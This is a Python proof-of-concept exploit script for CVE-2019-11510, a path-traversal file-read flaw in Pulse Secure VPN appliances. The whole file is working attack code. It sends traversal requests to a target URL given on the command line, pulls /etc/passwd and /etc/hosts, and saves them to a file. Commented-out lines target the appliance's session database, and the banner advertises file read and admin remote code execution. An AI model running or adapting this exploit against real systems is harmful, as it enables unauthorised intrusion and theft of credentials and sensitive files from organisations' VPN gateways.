Penetration_Testing_POC/CVE-2019-11510/CVE-2019-11510.py

import requests
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
import os
import sys


banner = '''
   _______      ________    ___   ___  __  ___        __ __ _____ __  ___  
  / ____\ \    / /  ____|  |__ \ / _ \/_ |/ _ \      /_ /_ | ____/_ |/ _ \ 
 | |     \ \  / /| |__ ______ ) | | | || | (_) |______| || | |__  | | | | |
 | |      \ \/ / |  __|______/ /| | | || |\__, |______| || |___ \ | | | | |
 | |____   \  /  | |____    / /_| |_| || |  / /       | || |___) || | |_| |
  \_____|   \/   |______|  |____|\___/ |_| /_/        |_||_|____/ |_|\___/ 
                                                                           
                         Any file read and admin Rce

                         python By jas502n                                                  
'''
print banner

def etc_passwd(url):    
    file_read = ['/etc/passwd', '/etc/hosts']
    if url[-1] == '/':
        vuln_url_1 = url + 'dana-na/../dana/html5acc/guacamole/../../../../../../..%s?/dana/html5acc/guacamole/' % file_read[0]
        vuln_url_2 = url + 'dana-na/../dana/html5acc/guacamole/../../../../../../..%s?/dana/html5acc/guacamole/' % file_read[1]
        output = url[8:-1]

        mdb_url = url + "dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/"
    else:
        vuln_url_1 = url + '/dana-na/../dana/html5acc/guacamole/../../../../../../..%s?/dana/html5acc/guacamole/' % file_read[0]
        vuln_url_2 = url + '/dana-na/../dana/html5acc/guacamole/../../../../../../..%s?/dana/html5acc/guacamole/' % file_read[1]
        output = url[8:]

        mdb_url = url + "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/"

    r1 = requests.get(vuln_url_1, verify=False)
    r2 = requests.get(vuln_url_2, verify=False)
    # r3 = requests.get(mdb_url, verify=False)

    # print r3.status_code
    # print r3.content

    # file_mdb = open("data_runtime_mtmp_lmdb_dataa_data.mdb",'ab')
    # file_mdb.write(r3.content)
    # file.close


    if r1.status_code == 200 and 'root:x' in r1.text:
        print
        print url + " ---------------> Vulnerable"
        print "Writing all files to output file "  + output
        print "\nExtracting " + file_read[0]
        print
        print vuln_url_1
        print "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
        print r1.text
        print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"
        
        # os.system('mkdir %s' % output)

        f = open("c.txt","wb")
        f.write('\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n')
        f.write(file_read[0] + '\n\n' + r1.text+'\n')
        f.write('\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n')

        if r2.status_code == 200 and 'localhost' in r2.text:
            print "Extracting " + file_read[1]
            print
            print vuln_url_2
            print "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
            print r2.text
            print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"
            f.write(file_read[1] + '\n\n' + r2.text+'\n')
            f.write('\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n')
            f.close()
        


    else:
        print url + " ---------------> Not Vulnerable"







if __name__ == '__main__':

    url = sys.argv[1]
    etc_passwd(url)